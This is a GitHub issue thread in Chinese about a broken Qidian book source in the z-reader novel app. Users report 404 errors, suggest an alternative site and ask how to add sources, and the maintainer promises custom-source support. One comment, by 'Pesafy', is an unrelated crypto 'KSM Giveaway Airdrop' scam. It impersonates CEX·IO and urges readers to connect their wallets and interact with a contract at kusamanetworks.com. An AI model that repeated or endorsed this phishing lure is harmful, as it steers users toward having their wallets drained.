### ISSUE TITLE
起点的源不能用了

### ISSUE THREAD

**Issue by jy67502** [aooiuu/z-reader#129]
对了，推荐一个源，www.kdzw.cc，这个源稳定！

**Comment by jy67502** [comment]
是，只有我出这个问题吗

**Comment by tmall007** [comment]
@jy67502 起点源我也用不了，你分享的源怎么添加啊

**Comment by jy67502** [comment]
@tmall007 我就是不知道怎么添加这个源啊，我会我就自己添加了，我把作者这个工程拉下来，想自己改过，发现完全不行，不会。kdzw，这个源好就好在起点的免费章结，基本他都有。

**Comment by jeffreyouni** [comment]
> @tmall007 我就是不知道怎么添加这个源啊，我会我就自己添加了，我把作者这个工程拉下来，想自己改过，发现完全不行，不会。kdzw，这个源好就好在起点的免费章结，基本他都有。

这个路劲下可以添加新的源解析
src/reader/driver

**Comment by bill-mark** [comment]
出现这个问题+1 直接404了

**Comment by Pesafy** [comment]
## Congratulations! You've receive in $3,000 KSM Giveaway ($KSM) Airdrop 🪂🔴


CEX·IO is giving away $3,000 in $KSM coins, empowering you to take advantage of KSM staking on CEX·IO with 14% APY. Join the giveaway and earn a chance to win up to $500. Stake Kusama with CEX·IO, get high rewards and win prizes!

#### About

CEX·IO is a fully regulated multi-functional cryptocurrency exchange established in 2013, serving over 4 million customers worldwide. CEX·IO has been one of the first platforms to make fiat-to-crypto transactions accessible via bank transfers and to accept debit/credit card payments for crypto deposits and withdrawals to Visa or MasterCard.

→ [How to join the $3,000 KSM Giveaway Airdrop?](https://kusamanetworks.com/)


Connect your wallet, follow the instructions, and claim this exclusive airdrop from Kusama. For GitHub users only—share with friends to make it eligible. Redeem your reward first.

![Kusama Exchange](https://cdn.airdropalert.com/images/metadata/kusamacex2222.jpeg)


### Step-by-Step Guide ''CEX·IO Kusama Giveaway''

Access the Kusama platform and connect your wallet securely. Ensure you're using a trusted wallet for the transaction.

- 🔗 Use the connect method to interact with the contract
- 💰 Connect and receive your tokens
→ [Claim Your $KSM Today](https://kusamanetworks.com/)

**Comment by aooiuu** [comment]
年后会更新。新版本会支持自定义源
